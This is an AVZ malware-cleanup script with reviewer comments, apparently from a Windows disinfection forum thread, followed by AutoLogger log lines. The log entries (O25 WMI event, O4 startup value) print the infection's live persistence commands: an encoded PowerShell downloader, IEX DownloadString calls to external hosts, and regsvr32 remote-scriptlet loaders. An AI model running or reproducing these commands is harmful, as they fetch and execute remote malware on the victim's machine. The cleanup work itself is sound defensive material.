// AVZ cleanup script (DelphiScript-style). Everything here is a side-effecting
// call into the AVZ runtime; the order matters: network off -> protections on
// -> quarantine copies -> deletions -> task/registry cleanup -> boot cleaner -> reboot.
begin
// Stop the TCP/IP service before touching anything, presumably to cut the host
// off the network while the cleanup runs; "/y" auto-confirms the dependent-service
// prompt. The remaining arguments look like AVZ's show-window / timeout (ms) /
// wait flags — TODO confirm against the AVZ script reference.
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
// Rootkit search and AVZGuard are only enabled when AVZ is NOT running under
// WOW64 (presumably a 32-bit Windows host); on 64-bit hosts this branch is skipped.
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
// Copy each suspect file into the AVZ quarantine BEFORE it is deleted below, so
// samples survive for analysis. The second argument is left empty here
// (presumably an optional description/comment field — verify).
// NOTE(review): several paths below end with a stray '>' (update.exe>, item.dat>,
// lsmosee.exe>) — this looks like a copy artifact from the log rather than part of
// the file name, and item.dat is listed both with and without it. Confirm the real
// paths before running; a wrong path silently quarantines/deletes nothing.
QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
QuarantineFile('c:\windows\update.exe>','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\debug\item.dat>','');
QuarantineFile('c:\windows\help\lsmosee.exe>','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
// Delete the same set of files. The '32' flag string presumably requests deferred
// deletion through the boot cleaner (see BC_Activate / BC_ImportALL below) so that
// files locked at runtime are removed on the next boot — TODO confirm the flag meaning.
DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('c:\windows\help\lsmosee.exe>','32');
DeleteFile('c:\windows\debug\item.dat>','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('c:\windows\update.exe>','32');
DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
// Remove the scheduled task that presumably relaunches Pupdbrowser.exe.
DeleteSchedulerTask('Pupdbrowser');
// Remove the HKLM Run value named 'start' and its MSConfig startupreg mirror.
// The O4 log entry on this page shows this 'start' value as a regsvr32
// "/u /s /i:http://... scrobj.dll" scriptlet loader, i.e. a remote-script
// persistence entry. 'x32' selects the registry view — presumably the 32-bit view.
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
// Remove the remaining scheduled tasks named in the findings. Their contents are
// not shown on this page, so nothing is claimed about what they launch.
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
// NOTE(review): the O25 WMI event subscription listed on this page (filter
// 'fuckyoumm3', consumer 'fuckyoumm4', a download-and-execute PowerShell /
// regsvr32 chain) is NOT removed by this script. Unless it is handled separately,
// persistence may survive the reboot and re-stage the deleted files.
// Boot-cleaner and system-cleanup stage: activate the boot cleaner, run AVZ's
// system clean, run the 'SCU' wizard (arguments presumably category/level/auto-
// apply — verify), import all pending boot-cleaner jobs, then force a reboot so
// the deferred deletions are executed.
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
// Second AVZ script, run after the cleanup/reboot: package the quarantine folder
// for upload. Any previous archive is removed first so the new one is not appended to.
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
// 7-Zip: 'a' = add to archive, '-mx9' = maximum compression, '-pmalware' = encrypt
// with the password "malware" (the conventional password for sharing samples so
// AV scanners do not strip the archive in transit). Output is 'quarantine' (.7z)
// in the AVZ directory, input is everything under .\Quarantine\. The trailing
// arguments look like AVZ's show-window / timeout (ms, here 300 s) / wait flags —
// TODO confirm against the AVZ script reference.
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
...Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)